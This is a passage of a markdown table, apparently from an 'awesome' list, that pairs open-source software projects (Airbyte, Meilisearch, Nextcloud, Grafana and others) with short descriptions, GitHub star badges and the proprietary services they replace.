[Ecwid](https://www.ecwid.com/) E-commerce|[Vue Storefront](https://www.vuestorefront.io/)|Frontend for e-commerce platform|<a href=https://github.com/vuestorefront/vue-storefront><img src="https://img.shields.io/github/stars/vuestorefront/vue-storefront?style=social" width=150/></a>|[Shogun](https://getshogun.com/) ELT / ETL|[Airbyte](https://airbyte.io/)|Data integration platform|<a href=https://github.com/airbytehq/airbyte><img src="https://img.shields.io/github/stars/airbytehq/airbyte?style=social" width=150/></a>|[Fivetran](https://fivetran.com/) ELT / ETL|[Benthos](https://benthos.dev/)|Data streaming processor with yaml-driven pipeline configuration|<a href=https://github.com/benthosdev/benthos><img src="https://img.shields.io/github/stars/benthosdev/benthos?style=social" width=150/></a>|[Fivetran](https://fivetran.com/) ELT / ETL|[Dagster](https://dagster.io/)|Orchestration platform for data assets|<a href=https://github.com/dagster-io/dagster><img src="https://img.shields.io/github/stars/dagster-io/dagster?style=social" width=150/></a>|[Fivetran](https://fivetran.com/) ELT / ETL|[Kestra](https://kestra.io/)|orchestration and scheduling platform|<a href=https://github.com/kestra-io/kestra><img src="https://img.shields.io/github/stars/kestra-io/kestra?style=social" width=150/></a>|[Fivetran](https://fivetran.com/) ELT / ETL|[Orchest](https://www.orchest.io/)|No-code data pipelines builder|<a href=https://github.com/orchest/orchest><img src="https://img.shields.io/github/stars/orchest/orchest?style=social" width=150/></a>|[Fivetran](https://fivetran.com/) ELT / ETL|[Prefect](https://www.prefect.io/)|Data orchestration platform for a modern data stack|<a href=https://github.com/prefecthq/prefect><img src="https://img.shields.io/github/stars/prefecthq/prefect?style=social" width=150/></a>|[Fivetran](https://fivetran.com/) ELT / ETL|[Selefra](https://www.selefra.io/)|An open-source policy-as-code software that provides analytics for multi-cloud and SaaS.|<a href=https://github.com/selefra/selefra><img src="https://img.shields.io/github/stars/selefra/selefra?style=social" width=150/></a>|[Fivetran](https://fivetran.com/) ERP|[DoliCloud](https://dolicloud.com) | Business management suite (ERP and CRM)|<a href=https://github.com/Dolibarr/dolibarr><img src="https://img.shields.io/github/stars/Dolibarr/dolibarr?style=social" width=150/></a>|[Oracle Fusion ERP Cloud](https://www.oracle.com/erp),[Odoo](https://odoo.com/),[Microsoft Dynamics](https://dynamics.microsoft.com/) ERP|[ERPNext](https://erpnext.com) | Agile, modern, module based Business management suite|<a href=https://github.com/frappe/erpnext><img src="https://img.shields.io/github/stars/frappe/erpnext?style=social" width=150/>|[SAP Business One](https://www.sap.com/products/business-one.html), [Odoo](https://odoo.com/) Email marketing|[Keila](https://www.keila.io/)|Email newsletter tool|<a href=https://github.com/pentacent/keila><img src="https://img.shields.io/github/stars/pentacent/keila?style=social" width=150/></a>|[Mailchimp](https://mailchimp.com), [Sendinblue](https://www.sendinblue.com)| Enterprise Search|[AppBase](https://www.appbase.io/)|Search UI components for React and Vue|<a href=https://github.com/appbaseio/reactivesearch><img src="https://img.shields.io/github/stars/appbaseio/reactivesearch?style=social" width=150/></a>|[Algolia](https://www.algolia.com/) Enterprise Search|[Jina.ai](https://jina.ai/)|Neural search framework for 𝙖𝙣𝙮 kind of data (including images)|<a href=https://github.com/jina-ai/jina><img 
src="https://img.shields.io/github/stars/jina-ai/jina?style=social" width=150/></a>|[Algolia](https://www.algolia.com/) Enterprise Search|[Manticore Search](https://manticoresearch.com/)|Easy to use open source fast database for search|<a href=https://github.com/manticoresoftware/manticoresearch/><img src="https://img.shields.io/github/stars/manticoresoftware/manticoresearch?style=social" width=150/></a>|[Elastic Cloud](https://www.elastic.co/elastic-stack/) Enterprise Search|[Meilisearch](https://www.meilisearch.com/)|Typo tolerant search engine|<a href=https://github.com/meilisearch/meilisearch><img src="https://img.shields.io/github/stars/meilisearch/MeiliSearch?style=social" width=150/></a>|[Algolia](https://www.algolia.com/) Enterprise Search|[Qdrant](https://qdrant.tech/)|Vector similarity search engine with extended filtering support|<a href=https://github.com/qdrant/qdrant><img src="https://img.shields.io/github/stars/qdrant/qdrant?style=social" width=150/></a>|[Google Vertex AI](https://cloud.google.com/vertex-ai), [Algolia](https://www.algolia.com/)| Enterprise Search|[SeMI](https://www.semi.technology/)'s [Weaviate](https://github.com/semi-technologies/weaviate)|Real-time vector search engine|<a href=https://github.com/semi-technologies/weaviate><img src="https://img.shields.io/github/stars/semi-technologies/weaviate?style=social" width=150/></a>|[Google Vertex AI](https://cloud.google.com/vertex-ai), [Algolia](https://www.algolia.com/) Enterprise Search|[TypeSense](https://typesense.org/)|Typo tolerant fuzzy search engine|<a href=https://github.com/typesense/typesense><img src="https://img.shields.io/github/stars/typesense/typesense?style=social" width=150/></a>|[Algolia](https://www.algolia.com/) Enterprise Search|[Zilliz](https://zilliz.com)'s [Milvus](https://milvus.io)|Vector database for AI applications|<a href=https://github.com/milvus-io/milvus><img src="https://img.shields.io/github/stars/milvus-io/milvus?style=social" width=150/></a>|[Google Vertex AI](https://cloud.google.com/vertex-ai) Enterprise Search|[Zinc Labs](https://www.zinclabs.io)'s [Zinc](https://github.com/prabhatsharma/zinc)|Cloud native full text search|<a href=https://github.com/prabhatsharma/zinc><img src="https://img.shields.io/github/stars/prabhatsharma/zinc?style=social" width=150/></a>|[Elastic Cloud](https://www.elastic.co/elastic-stack/) Enterprise Search|[deepset](https://www.deepset.ai/)|NLP platform to build enterprise-grade semantic search|<a href=https://github.com/deepset-ai/haystack><img src="https://img.shields.io/github/stars/deepset-ai/haystack?style=social" width=150/></a>|[AWS Kendra](https://aws.amazon.com/kendra/), [QnA Maker](https://www.qnamaker.ai/)| Feature flag and toggle management|[FlagSmith](https://flagsmith.com/)|Feature Flag & Remote Config Service|<a href=https://github.com/Flagsmith/flagsmith><img src="https://img.shields.io/github/stars/Flagsmith/flagsmith?style=social" width=150/></a>|[LaunchDarkly](https://launchdarkly.com/) Feature flag and toggle management|[GrowthBook](https://www.growthbook.io/)|Feature flags and A/B testing|<a href=https://github.com/growthbook/growthbook><img src="https://img.shields.io/github/stars/growthbook/growthbook?style=social" width=150/></a>|[LaunchDarkly](https://launchdarkly.com/) Feature flag and toggle management|[Unleash](https://www.getunleash.io/)|Feature flags platform|<a href=https://github.com/Unleash/unleash><img src="https://img.shields.io/github/stars/Unleash/unleash?style=social" 
width=150/></a>|[LaunchDarkly](https://launchdarkly.com/) File Hosting|[Filestash](https://www.filestash.app/)|A file manager that lets you manage your data anywhere it is located|<a href=https://github.com/mickael-kerjean/filestash><img src="https://img.shields.io/github/stars/mickael-kerjean/filestash?style=social" width=150/></a>|[Dropbox](https://www.dropbox.com/), [Google Drive](https://drive.google.com/)| File Hosting|[Nextcloud](https://nextcloud.com/)|A personal cloud which runs on your own server|<a href=https://github.com/nextcloud/server><img src="https://img.shields.io/github/stars/nextcloud/server?style=social" width=150/></a>|[Dropbox](https://www.dropbox.com/), [Google Drive](https://drive.google.com/)| File Hosting|[Owncloud](https://owncloud.com/)|A personal cloud which runs on your own server|<a href=https://github.com/owncloud/core><img src="https://img.shields.io/github/stars/owncloud/core?style=social" width=150/></a>|[Dropbox](https://www.dropbox.com/), [Google Drive](https://drive.google.com/) File Hosting|[Spacedrive](https://spacedrive.com/)|Cross-platform file manager, powered by a virtual distributed filesystem (VDFS) written in Rust|<a href=https://github.com/spacedriveapp/spacedrive><img src="https://img.shields.io/github/stars/spacedriveapp/spacedrive?style=social" width=150/></a>|[Dropbox](https://www.dropbox.com/), [Google Drive](https://drive.google.com/)| Financial Service|[Lago](https://www.getlago.com/)|Open Source Billing API|<a href=https://github.com/getlago/lago><img src="https://img.shields.io/github/stars/getlago/lago?style=social" width=150/></a>|[Stripe Billing](https://stripe.com/billing), [Chargebee](https://www.chargebee.com/)| Financial Service|[OpenBB Terminal](https://github.com/openbb-finance/OpenBBTerminal)|Investment research for everyone|<a href=https://github.com/GamestonkTerminal/GamestonkTerminal><img src="https://img.shields.io/github/stars/GamestonkTerminal/GamestonkTerminal?style=social" width=150/></a>|[Bloomberg](https://www.bloomberg.com/) Form Building|[FormKit](https://formkit.com/)| Software to help build attractive forms|<a href=https://github.com/formkit/formkit><img src="https://img.shields.io/github/stars/formkit/formkit?style=social" width=150></a>|[Vueform](https://vueform.com/),[Typeform](https://www.typeform.com/) Form Building|[Formbricks](https://formbricks.com/)| Build forms and receive & manage submission data in one platform |<a href=https://github.com/formbricks/formbricks><img src="https://img.shields.io/github/stars/formbricks/formbricks?style=social" width=150></a>|[Typeform](https://www.typeform.com/), [Google Forms](https://forms.google.com), [React Hook Form](https://react-hook-form.com/) Form Building|[Formio](https://form.io/)| A Form and Data Management Platform for Progressive Web Applications|<a href=https://github.com/formio/formio><img src="https://img.shields.io/github/stars/formio/formio?style=social" width=150></a>|[Vueform](https://vueform.com/),[Typeform](https://www.typeform.com/) Forum Software|[Discourse](https://www.discourse.org/)|A platform for community discussion|<a href=https://github.com/discourse/discourse><img src="https://img.shields.io/github/stars/discourse/discourse?style=social" width=150/></a>|[Tribe](https://tribe.so/), [Circle](https://circle.so/) Forum Software|[Vanilla](https://vanillaforums.com/)|A platform for community discussion|<a href=https://github.com/vanilla/vanilla><img src="https://img.shields.io/github/stars/vanilla/vanilla?style=social"
width=150/></a>|[Tribe](https://tribe.so/), [Circle](https://circle.so/)| Graph database|[ArangoDB](https://www.arangodb.com/)|Graph database and document store|<a href=https://github.com/arangodb/arangodb><img src="https://img.shields.io/github/stars/arangodb/arangodb?style=social" width=150/></a>|[TigerGraph](https://www.tigergraph.com/), [Amazon Neptune](https://aws.amazon.com/neptune/) Graph database|[Memgraph](https://memgraph.com/)|In-memory graph database|<a href=https://github.com/memgraph/memgraph><img src="https://img.shields.io/github/stars/memgraph/memgraph?style=social" width=150/></a>|[TigerGraph](https://www.tigergraph.com/), [Amazon Neptune](https://aws.amazon.com/neptune/) Graph database|[Neo4j](http://neo4j.com/)|Graph database platform|<a href=https://github.com/neo4j/neo4j><img src="https://img.shields.io/github/stars/neo4j/neo4j?style=social" width=150/></a>|[TigerGraph](https://www.tigergraph.com/), [Amazon Neptune](https://aws.amazon.com/neptune/) Graph database|[TerminusDB](https://terminusdb.com/)|Knowledge graph and document store|<a href=https://github.com/terminusdb/terminusdb><img src="https://img.shields.io/github/stars/terminusdb/terminusdb?style=social" width=150/></a>|[TigerGraph](https://www.tigergraph.com/), [Amazon Neptune](https://aws.amazon.com/neptune/) Helpdesk Solution|[Peppermint](https://peppermint.sh)|Ticket Management & Helpdesk system|<a href=https://github.com/Peppermint-Lab/peppermint><img src="https://img.shields.io/github/stars/Peppermint-Lab/peppermint?style=social" width=150/></a>|[Zendesk](https://www.zendesk.co.uk/) Helpdesk Solution|[UVDesk](https://www.uvdesk.com/en/)|Ticket Management & Helpdesk system|<a href=https://github.com/uvdesk/community-skeleton><img src="https://img.shields.io/github/stars/uvdesk/community-skeleton?style=social" width=150/></a>|[Zendesk](https://www.zendesk.co.uk/) Internal Tools|[AppSmith](https://www.appsmith.com/)|Low-code platform for internal tools|<a href=https://github.com/appsmithorg/appsmith><img src="https://img.shields.io/github/stars/appsmithorg/appsmith?style=social" width=150/></a>|[Retool](https://retool.com/) Internal Tools|[Budibase](https://budibase.com/)|Low-code platform for internal tools|<a href=https://github.com/Budibase/budibase><img src="https://img.shields.io/github/stars/Budibase/budibase?style=social" width=150/></a>|[Retool](https://retool.com/) Internal Tools|[ILLA Cloud](https://www.illacloud.com/)|Low-code platform for developers to build internal tools in minutes.|<a href=https://github.com/illacloud/illa-builder><img src="https://img.shields.io/github/stars/illacloud/illa-builder?style=social" width=150/></a>|[Retool](https://retool.com/) Internal Tools|[Lowdefy](https://lowdefy.com/)|YAML-based low-code platform for internal tools|<a href=https://github.com/lowdefy/lowdefy><img src="https://img.shields.io/github/stars/lowdefy/lowdefy?style=social" width=150/></a>|[Retool](https://retool.com/) Internal Tools|[Tooljet](https://tooljet.io/)|Low-code framework for internal tools|<a href=https://github.com/tooljet/tooljet><img src="https://img.shields.io/github/stars/tooljet/tooljet?style=social" width=150/></a>|[Retool](https://retool.com/) Internal Tools|[Windmill](https://windmill.dev/)|Company-wide apps and automations from minimal python or typescript scripts|<a href=https://github.com/windmill-labs/windmill><img src="https://img.shields.io/github/stars/windmill-labs/windmill?style=social" width=150/></a>|[Retool](https://retool.com/)| Localization 
(i18n)|[Tolgee](https://tolgee.io)|Developer & translator friendly web-based localization platform|<a href=https://github.com/tolgee/tolgee-platform><img src="https://img.shields.io/github/stars/tolgee/tolgee-platform?style=social" width=150/></a>|[Lokalise](https://www.lokalise.com/), [Transifex](https://www.transifex.com/), [Crowdin](https://crowdin.com/), [POEditor](https://poeditor.com/) Localization (i18n)|[inlang](https://www.inlang.com/)|Developer-first localization infrastructure built on git|<a href=https://github.com/inlang/inlang><img src="https://img.shields.io/github/stars/inlang/inlang?style=social" width=150/></a>|[Lokalise](https://www.lokalise.com/), [Transifex](https://www.transifex.com/), [Crowdin](https://crowdin.com/), [POEditor](https://poeditor.com/) Log Management|[Graylog](https://www.graylog.org/)|Log management platform|<a href=https://github.com/Graylog2/graylog2-server><img src="https://img.shields.io/github/stars/Graylog2/graylog2-server?style=social" width=150/></a>|[Splunk](https://www.splunk.com/) Log Management|[Quickwit](https://quickwit.io/)|Cloud-native log management & analytics|<a href=https://github.com/quickwit-oss/quickwit><img src="https://img.shields.io/github/stars/quickwit-oss/quickwit?style=social" width=150/></a>|[Elastic Cloud](https://www.elastic.co/elastic-stack/) ML Ops|[Cortex](https://www.cortex.dev/)|Production infrastructure for machine learning|<a href=https://github.com/cortexlabs/cortex><img src="https://img.shields.io/github/stars/cortexlabs/cortex?style=social" width=150/></a>|[AWS SageMaker](https://aws.amazon.com/sagemaker/) ML Ops|[Metarank](https://metarank.ai)|AutoML style personalized ranking|<a href=https://github.com/metarank/metarank><img src="https://img.shields.io/github/stars/metarank/metarank?style=social" width=150/></a>|[AWS Personalize](https://aws.amazon.com/personalize/), [Tecton](https://www.tecton.ai/)| ML Ops|[MindsDB](https://mindsdb.com/)|In-database machine learning platform|<a href=https://github.com/mindsdb/mindsdb><img src="https://img.shields.io/github/stars/mindsdb/mindsdb?style=social" width=150/></a>|[BigQuery ML](https://cloud.google.com/bigquery-ml/docs)| ML Ops|[Ploomber](https://ploomber.io/)|YAML-based pipeline builder for ML models|<a href=https://github.com/ploomber/ploomber><img src="https://img.shields.io/github/stars/ploomber/ploomber?style=social" width=150/></a>|[AWS SageMaker](https://aws.amazon.com/sagemaker/)| ML Ops|[Seldon](https://seldon.io/)|Deployment & monitoring for machine learning at scale|<a href=https://github.com/SeldonIO/seldon-core><img src="https://img.shields.io/github/stars/SeldonIO/seldon-core?style=social" width=150/></a>|[AWS SageMaker](https://aws.amazon.com/sagemaker/), [Google Vertex AI](https://cloud.google.com/vertex-ai)| ML Ops|[Zilliz](https://zilliz.com)'s [Towhee](https://towhee.io)|Platform for generating embedding vectors|<a href=https://github.com/towhee-io/towhee><img src="https://img.shields.io/github/stars/towhee-io/towhee?style=social" width=150/></a>|[AWS SageMaker](https://aws.amazon.com/sagemaker)| Marketing SaaS|[Dub](https://dub.sh/)|Open-source Bitly Alternative with built-in analytics|<a href=https://github.com/steven-tey/dub><img src="https://img.shields.io/github/stars/steven-tey/dub?style=social" width=150/></a>|[Bitly](https://bitly.com/) Messaging|[Element](https://element.io/)|Enterprise communication platform|<a href=https://github.com/vector-im/element-web><img 
src="https://img.shields.io/github/stars/vector-im/element-web?style=social" width=150/></a>|[Slack](https://slack.com/)| Messaging|[Mattermost](https://mattermost.com/)|Enterprise communication platform for developers|<a href=https://github.com/mattermost/mattermost-server><img src="https://img.shields.io/github/stars/mattermost/mattermost-server?style=social" width=150/></a>|[Slack](https://slack.com/)| Messaging|[Rocket.chat](https://rocket.chat/)|Enterprise communication platform|<a href=https://github.com/RocketChat/Rocket.Chat><img src="https://img.shields.io/github/stars/RocketChat/Rocket.Chat?style=social" width=150/></a>|[Slack](https://slack.com/)| Messaging|[Tinode](https://tinode.co/)|General instant messaging|<a href=https://github.com/tinode/chat><img src="https://img.shields.io/github/stars/tinode/chat?style=social" width=150/></a>|[WhatsApp](https://www.whatsapp.com/), [Telegram](https://www.telegram.org/)| Messaging|[Zulip](https://zulip.com/)|Team chat|<a href=https://github.com/zulip/zulip><img src="https://img.shields.io/github/stars/zulip/zulip?style=social" width=150/></a>|[Slack](https://slack.com/)| Metrics store|[Cube.js](https://cube.dev/)|Headless business intelligence suite|<a href=https://github.com/cube-js/cube.js><img src="https://img.shields.io/github/stars/cube-js/cube.js?style=social" width=150/></a>|[Looker](https://looker.com/) Metrics store|[Evidence](https://evidence.dev/)|Lightweight BI using SQL and markdown|<a href=https://github.com/evidence-dev/evidence><img src="https://img.shields.io/github/stars/evidence-dev/evidence?style=social" width=150/></a>|[Looker](https://looker.com/) Metrics store|[LightDash](https://www.lightdash.com/)|Low-code metrics layer, alternative to Looker|<a href=https://github.com/lightdash/lightdash><img src="https://img.shields.io/github/stars/lightdash/lightdash?style=social" width=150/></a>|[Looker](https://looker.com/) Metrics store|[MLCraft](http://mlcraft.io/)|Low-code metrics layer, alternative to Looker|<a href=https://github.com/mlcraft-io/mlcraft><img src="https://img.shields.io/github/stars/mlcraft-io/mlcraft?style=social" width=150/></a>|[Looker](https://looker.com/) Metrics store|[MetriQL](https://metriql.com/)|Headless business intelligence suite|<a href=https://github.com/metriql/metriql><img src="https://img.shields.io/github/stars/metriql/metriql?style=social" width=150/></a>|[Looker](https://looker.com/) No-code database|[Baserow](https://baserow.io/)|No-code database and Airtable alternative|<a href=https://gitlab.com/bramw/baserow><img src="https://about.gitlab.com/images/press/logo/png/gitlab-logo-gray-rgb.png" width=150/></a>|[AirTable](https://www.airtable.com/) No-code database|[NocoDB](https://www.nocodb.com/)|No-code database and Airtable alternative|<a href=https://github.com/nocodb/nocodb><img src="https://img.shields.io/github/stars/nocodb/nocodb?style=social" width=150/></a>|[AirTable](https://www.airtable.com/) No-code database|[Rowy](https://www.rowy.io/)|Extendable Airtable-like spreadsheet UI for databases|<a href=https://github.com/rowyio/rowy><img src="https://img.shields.io/github/stars/rowyio/rowy?style=social" width=150/></a>|[AirTable](https://www.airtable.com/)| No-code database|[Totum](https://totum.online/)|Business database for non-programmers|<a href=https://github.com/totumonline/totum-mit><img src="https://img.shields.io/github/stars/totumonline/totum-mit?style=social" width=150/></a>|[AirTable](https://www.airtable.com/)| 
Notetaking|[AppFlowy](https://www.appflowy.io/)|Open-source alternative to Notion|<a href=https://github.com/AppFlowy-IO/appflowy><img src="https://img.shields.io/github/stars/AppFlowy-IO/appflowy?style=social" width=150/></a>|[Notion](https://www.notion.so/) Notetaking|[Athens Research](https://www.athensresearch.org/)|Knowledge graph for research and notetaking|<a href=https://github.com/athensresearch/athens><img src="https://img.shields.io/github/stars/athensresearch/athens?style=social" width=150/></a>|[Roam Research](https://roamresearch.com/)| Notetaking|[Bangle.io](https://bangle.io/)|A rich note taking web app that works on top of your locally saved Markdown files|<a href=https://github.com/bangle-io/bangle-io><img src="https://img.shields.io/github/stars/bangle-io/bangle-io?style=social" width=150/></a>|[Notion](https://www.notion.so/)| Notetaking|[Boost Note](https://boostnote.io/)|Collaborative workspace for developer teams|<a href=https://github.com/BoostIO/BoostNote-App><img src="https://img.shields.io/github/stars/BoostIO/BoostNote-App?style=social" width=150/></a>|[Notion](https://www.notion.so/)| Notetaking|[Dendron](https://www.dendron.so/)|Knowledge base plugin for VS Code|<a href=https://github.com/dendronhq/dendron><img src="https://img.shields.io/github/stars/dendronhq/dendron?style=social" width=150/></a>|[Roam Research](https://roamresearch.com/)| Notetaking|[Joplin](https://joplinapp.org/)|Secure, Cross-platform, Open-Source Markdown Note Taking App|<a href=https://github.com/laurent22/joplin><img src="https://img.shields.io/github/stars/laurent22/joplin?style=social" width=150/></a>|[Evernote](https://evernote.com/), [Onenote](https://www.onenote.com/n), [Roam Research](https://roamresearch.com/)| Notetaking|[Logseq](https://logseq.com/)|Knowledge base manager|<a href=https://github.com/logseq/logseq><img src="https://img.shields.io/github/stars/logseq/logseq?style=social" width=150/></a>|[Roam Research](https://roamresearch.com/)| Notetaking|[Notabase](https://notabase.io)|Powerful and easy-to-use note-taking app for networked thinking|<a href=https://github.com/churichard/notabase><img src="https://img.shields.io/github/stars/churichard/notabase?style=social" width=150/></a>|[Notion](https://www.notion.so/), [Roam Research](https://roamresearch.com/)| Notetaking|[Notesnook](https://notesnook.com/)|A fully open source & end-to-end encrypted note taking alternative to Evernote.|<a href=https://github.com/streetwriters/notesnook><img src="https://img.shields.io/github/stars/streetwriters/notesnook?style=social" width=150/></a>|[Evernote](https://evernote.com/), [OneNote](https://www.onenote.com/n)| Notetaking|[Outline](https://www.getoutline.com/)|Wiki and knowledge base|<a href=https://github.com/outline/outline><img src="https://img.shields.io/github/stars/outline/outline?style=social" width=150/></a>|[Notion](https://notion.so)| Notetaking|[Trilium.cc](https://trilium.cc/)|Personal knowledge base|<a href=https://github.com/zadam/trilium><img src="https://img.shields.io/github/stars/zadam/trilium?style=social" width=150/></a>|[Evernote](https://evernote.com/), [Onenote](https://www.onenote.com/) Observability and monitoring|[Chaos Genius](https://www.chaosgenius.io/)|ML powered analytics engine for outlier/anomaly detection and root cause analysis|<a href=https://github.com/chaos-genius/chaos_genius><img src="https://img.shields.io/github/stars/chaos-genius/chaos_genius?style=social" width=150/></a>|[AWS
Lookout](https://aws.amazon.com/lookout-for-metrics/), [Anodot](https://www.anodot.com/), [Sisu Data](https://sisudata.com/), [Outlier](https://outlier.ai/) Observability and monitoring|[Grafana](https://grafana.com/)|Observability and data visualization platform|<a href=https://github.com/grafana/grafana><img src="https://img.shields.io/github/stars/grafana/grafana?style=social" width=150/></a>|[DataDog](https://www.datadoghq.com/), [NewRelic](https://newrelic.com/) Observability and monitoring|[Netdata](https://www.netdata.cloud)|Application monitoring and observability platform|<a href=https://github.com/netdata/netdata><img src="https://img.shields.io/github/stars/netdata/netdata?style=social" width=150/></a>|[DataDog](https://www.datadoghq.com/), [NewRelic](https://newrelic.com/) Observability and monitoring|[Sentry](https://sentry.io/)|Application monitoring with a focus on error reporting|<a href=https://github.com/getsentry/sentry><img src="https://img.shields.io/github/stars/getsentry/sentry?style=social" width=150/></a>|[DataDog](https://www.datadoghq.com/), [NewRelic](https://newrelic.com/) Observability and monitoring|[Signoz](https://signoz.io/)|Application monitoring and observability platform|<a href=https://github.com/signoz/signoz><img src="https://img.shields.io/github/stars/signoz/signoz?style=social" width=150/></a>|[DataDog](https://www.datadoghq.com/), [NewRelic](https://newrelic.com/) Observability and monitoring|[Uptrace](https://uptrace.dev/)|Application monitoring and observability platform|<a href=https://github.com/uptrace/uptrace><img src="https://img.shields.io/github/stars/uptrace/uptrace?style=social" width=150/></a>|[DataDog](https://www.datadoghq.com/), [NewRelic](https://newrelic.com/) Observability and monitoring|[VictoriaMetrics](https://victoriametrics.com/)|Application monitoring and observability platform|<a href=https://github.com/VictoriaMetrics/VictoriaMetrics><img src="https://img.shields.io/github/stars/victoriametrics/victoriametrics?style=social" width=150/></a>|[DataDog](https://www.datadoghq.com/), [NewRelic](https://newrelic.com/) Password manager|[BitWarden](https://bitwarden.com/)|Password manager for teams and individuals|<a href=https://github.com/bitwarden/server><img src="https://img.shields.io/github/stars/bitwarden/server?style=social" width=150/></a>|[1Password](https://1password.com/) Password manager|[Padloc](https://padloc.app/)|Password manager for teams and individuals|<a href=https://github.com/padloc/padloc><img src="https://img.shields.io/github/stars/padloc/padloc?style=social" width=150/></a>|[1Password](https://1password.com/)| Password manager|[Passbolt](https://www.passbolt.com/)|Password manager for teams and individuals|<a href=https://github.com/passbolt/passbolt_api><img src="https://img.shields.io/github/stars/passbolt/passbolt_api?style=social" width=150/></a>|[1Password](https://1password.com/) Platform as a service|[Coolify](https://coolify.io/)|Self-hostable Heroku alternative|<a href=https://github.com/coollabsio/coolify><img src="https://img.shields.io/github/stars/coollabsio/coolify?style=social" width=150/></a>|[Heroku](https://www.heroku.com/)| Platform as a service|[Dokku](https://dokku.com/)|An open source PAAS alternative to Heroku|<a href=https://github.com/dokku/dokku><img src="https://img.shields.io/github/stars/dokku/dokku?style=social" width=150/></a>|[Heroku](https://www.heroku.com/)| Platform as a service|[Otomi](https://otomi.io)|Self-hosted PaaS for Kubernetes|<a 
href=https://github.com/redkubes/otomi-core><img src="https://img.shields.io/github/stars/redkubes/otomi-core?style=social" width=150/></a>|[Heroku](https://www.heroku.com/) Platform as a service|[Porter](https://porter.run/)|Kubernetes powered PaaS that runs in your own cloud|<a href=https://github.com/porter-dev/porter><img src="https://img.shields.io/github/stars/porter-dev/porter?style=social" width=150/></a>|[Heroku](https://www.heroku.com/) Platform as a service|[Pulumi](https://www.pulumi.com/)|Universal Infrastructure as Code|<a href=https://github.com/pulumi/pulumi><img src="https://img.shields.io/github/stars/pulumi/pulumi?style=social" width=150/></a>|[Heroku](https://www.heroku.com/)| Platform as a service|[Qovery](https://www.qovery.com/)|Kubernetes powered PaaS that runs in your own cloud|<a href=https://github.com/Qovery/engine><img src="https://img.shields.io/github/stars/Qovery/engine?style=social" width=150/></a>|[Heroku](https://www.heroku.com/) Platform as a service|[Space Cloud](https://space-cloud.io/)|Serverless cloud deployment platform|<a href=https://github.com/spacecloud-io/space-cloud><img src="https://img.shields.io/github/stars/spacecloud-io/space-cloud?style=social" width=150/></a>|[Heroku](https://www.heroku.com/)| Platform as a service|[dyrector.io](https://dyrector.io)|Simplify container delivery without vendor lock|<a href=https://github.com/dyrector-io/dyrectorio><img src="https://img.shields.io/github/stars/dyrector-io/dyrectorio?style=social" width=150/></a>|[Heroku](https://www.heroku.com/)| Product Analytics|[Objectiv](https://objectiv.io/)|Product analytics infrastructure|<a href=https://github.com/objectiv/objectiv-analytics><img src="https://img.shields.io/github/stars/objectiv/objectiv-analytics?style=social" width=150/></a>|[Google Analytics](https://analytics.google.com/analytics/web/), [Amplitude](https://amplitude.com/), [Mixpanel](https://mixpanel.com/)| Product Analytics|[PostHog](https://posthog.com/)|Product analytics platform|<a href=https://github.com/PostHog/posthog><img src="https://img.shields.io/github/stars/PostHog/posthog?style=social" width=150/></a>|[Amplitude](https://amplitude.com/), [MixPanel](https://mixpanel.com/) Project Management|[Focalboard](https://www.focalboard.com/)|Alternative to Trello, Notion, and Asana|<a href=https://github.com/mattermost/focalboard><img src="https://img.shields.io/github/stars/mattermost/focalboard?style=social" width=150/></a>|[Trello](https://trello.com/), [Notion](https://www.notion.so/), [Asana](https://asana.com/)| Project Management|[OpenProject](https://www.openproject.org/)|Project management software|<a href=https://github.com/opf/openproject><img src="https://img.shields.io/github/stars/opf/openproject?style=social" width=150/></a>|[Asana](https://asana.com/), [Trello](https://trello.com/)| Project Management|[Plane](https://plane.so/)|Alternative to Linear, JIRA, Trello and Height|<a href=https://github.com/makeplane/plane><img src="https://img.shields.io/github/stars/makeplane/plane?style=social" width=150/></a>|[Linear](https://linear.app/), [JIRA](https://www.atlassian.com/software/jira), [Trello](https://trello.com/), [Height](https://height.app/)| Project Management|[Taiga](https://www.taiga.io/)|Project management software|<a href=https://github.com/kaleidos-ventures/taiga-docker><img src="https://img.shields.io/github/stars/kaleidos-ventures/taiga-docker?style=social" width=150/></a>|[Asana](https://asana.com/), [Trello](https://trello.com/), 
[Jira](https://www.atlassian.com/software/jira)| Project Management|[Vikunja](https://vikunja.io/)|The to-do app to organize your next project.|<a href=https://github.com/go-vikunja/api><img src="https://img.shields.io/github/stars/go-vikunja/api?style=social" width=150/></a>|[Todoist](https://todoist.com), [Trello](https://trello.com), [Asana](https://asana.com)| Relational database|[PingCAP](https://en.pingcap.com/)|NewSQL database that supports HTAP workloads|<a href=https://github.com/pingcap/tidb><img src="https://img.shields.io/github/stars/pingcap/tidb?style=social" width=150/></a>|[Amazon Aurora](https://aws.amazon.com/rds/aurora/), [Google Cloud Spanner](https://cloud.google.com/spanner/)| Relational database|[Yugabyte](https://www.yugabyte.com/)|High-performance distributed SQL database|<a href=https://github.com/yugabyte/yugabyte-db><img src="https://img.shields.io/github/stars/yugabyte/yugabyte-db?style=social" width=150/></a>|[Amazon Aurora](https://aws.amazon.com/rds/aurora/), [Google Cloud Spanner](https://cloud.google.com/spanner/)| Remote Desktop Application|[RustDesk](https://rustdesk.com/)|Open source virtual / remote desktop infrastructure for everyone|<a href=https://github.com/rustdesk/rustdesk><img src="https://img.shields.io/github/stars/rustdesk/rustdesk?style=social" width=150/></a>|[TeamViewer](https://teamviewer.com)| Reverse ETL|[Castled](https://castled.io/)|Data synchronization framework focused on external apps|<a href=https://github.com/castledio/castled><img src="https://img.shields.io/github/stars/castledio/castled?style=social" width=150/></a>|[Hightouch](https://www.hightouch.io/), [NewRelic](https://newrelic.com/) Reverse ETL|[Grouparoo](https://www.grouparoo.com/)|Data synchronization framework|<a href=https://github.com/grouparoo/grouparoo><img src="https://img.shields.io/github/stars/grouparoo/grouparoo?style=social" width=150/></a>|[Hightouch](https://www.hightouch.io/) Robotic Process Automation (RPA)|[RoboCorp](https://robocorp.com/)|Set of tooling that allows to create automation packages|<a href=https://github.com/robocorp/rcc><img src="https://img.shields.io/github/stars/robocorp/rcc?style=social" width=150/></a>|[UiPath](https://www.uipath.com/) Scheduling|[Cal.com](https://cal.com/)|Scheduling infrastructure, alternative to Calendly|<a href=https://github.com/calendso/calendso><img src="https://img.shields.io/github/stars/calendso/calendso?style=social" width=150/></a>|[Calendly](https://calendly.com/) Session replay software|[OpenReplay](https://openreplay.com/)|Session replay stack for developers|<a href=https://github.com/openreplay/openreplay><img src="https://img.shields.io/github/stars/openreplay/openreplay?style=social" width=150/></a>|[LogRocket](https://logrocket.com/), [FullStory](https://www.fullstory.com/) Social Media|[Postiz](https://postiz.com)|Self-hosted social media scheduling tool|<a 